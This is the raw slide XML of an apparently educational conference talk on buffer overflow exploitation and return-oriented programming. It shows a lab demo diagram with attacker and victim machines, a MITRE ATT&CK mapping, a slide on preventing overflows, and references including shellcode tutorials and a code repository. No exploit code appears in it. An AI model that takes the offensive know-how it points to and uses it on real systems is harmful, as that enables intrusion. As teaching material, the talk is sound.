              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE9FC731-10BB-0F39-5BE9-79FD3CEA4D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2543512" y="1530421"/>
            <a:ext cx="6815751" cy="381370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mr-IN" sz="4000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154351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Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="A picture containing icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C53378DB-FF48-07C1-9C55-3046D7592CAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5555441" y="2481705"/>
            <a:ext cx="971550" cy="485775"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 5" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E98D408-BED2-E081-9AD8-99988506A16E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1338695" y="2302102"/>
            <a:ext cx="1349088" cy="937261"/>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663E266E-7746-F3C0-3FEB-284D59A27AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9634698" y="2425455"/>
            <a:ext cx="714375" cy="600075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACF15712-7E6F-8E7F-450A-EF050801F9CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2569948" y="2729946"/>
            <a:ext cx="2854034" cy="346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2" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9900196-0EEB-9E61-28A4-C53952EB4ADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10270283" y="2883901"/>
            <a:ext cx="526474" cy="509156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 13" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB10937-8C9A-8DB5-5048-214B0E4C4D1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295401" y="2883902"/>
            <a:ext cx="569770" cy="587088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FACEAD3-FCB7-A5C0-D0BE-1FC6D76C8BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1034938" y="3576380"/>
            <a:ext cx="19669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Attacker  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(Kali Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>192.168.122.191</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1BEC72C-A322-A454-3303-8FB88F2A2DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8716965" y="3576204"/>
            <a:ext cx="25501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Victim </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>(Ubuntu 20.04)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>192.168.122.128</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Arrow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A6C6BA5-2A5A-60C1-38DD-129123F542EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6659866" y="2729946"/>
            <a:ext cx="2854034" cy="346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056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Demo (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA957CE-E414-BD12-2751-C3BB17C49AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1375120" y="707559"/>
            <a:ext cx="9525391" cy="5446557"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358169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How to prevent BOF exploits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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Follow secure coding best practices </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Always check bounds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Identify potential vulnerabilities with Veracode or similar tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Blackbox testing / fuzzing to identify potential vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Use a more secure language than C/C++ if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Keep software up-to-date</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>If software can't be patched, then introduce compensation controls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265431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Summary</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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Why is Buffer Overflow relevant?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What is Buffer Overflow?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What is Return Object Programming (ROP)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>How to prevent BOF exploits?</a:t>
            </a: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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31734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Questions/Comments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t>"I'm not a hacker, I'm just a sysadmin on someone else' systems" - a wiseman from the Internet.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2747748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References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vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://attack.mitre.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Buffer_overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://owasp.org/www-community/vulnerabilities/Buffer_Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://adamdoupe.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://axcheron.github.io/linux-shellcode-101-from-hell-to-shell/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.intel.com/content/dam/develop/external/us/en/documents/introduction-to-x64-assembly-181178.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://aaronbloomfield.github.io/pdr/book/x86-64bit-ccc-chapter.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-and-user-space-f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Return-oriented_programming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="86724D"/>
                </a:solidFill>
                <a:latin typeface="Garamond"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://github.com/JonathanSalwan/ROPgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Garamond"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225276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Code and Presentation link</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91B43F81-B7A0-D0FC-00C4-7C48A260A221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447801" y="1984503"/>
            <a:ext cx="9601196" cy="4043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a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/vc48372/KrakenKon2022.git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424565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is Buffer Overflow (BOF) relevant?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34643146-0D70-C0C2-8407-9DC024ABB5E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27596732"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1057469" y="3226837"/>
          <a:ext cx="10096231" cy="2011680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{616DA210-FB5B-4158-B5E0-FEB733F419BA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2420109">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1163706917"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2647561">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2911345487"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2869159">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="8504813"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2159402">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3809777979"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1177989">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Initial Access</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>(TA0001)</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Execution</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>(T1203)</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Privilege Escalation</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>(TA0004)</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Lateral Movement</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>(TA0008)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="0070C0"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="250889592"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="816428">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Exploit Public-Facing Application</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Exploitation for </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Client Execution</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
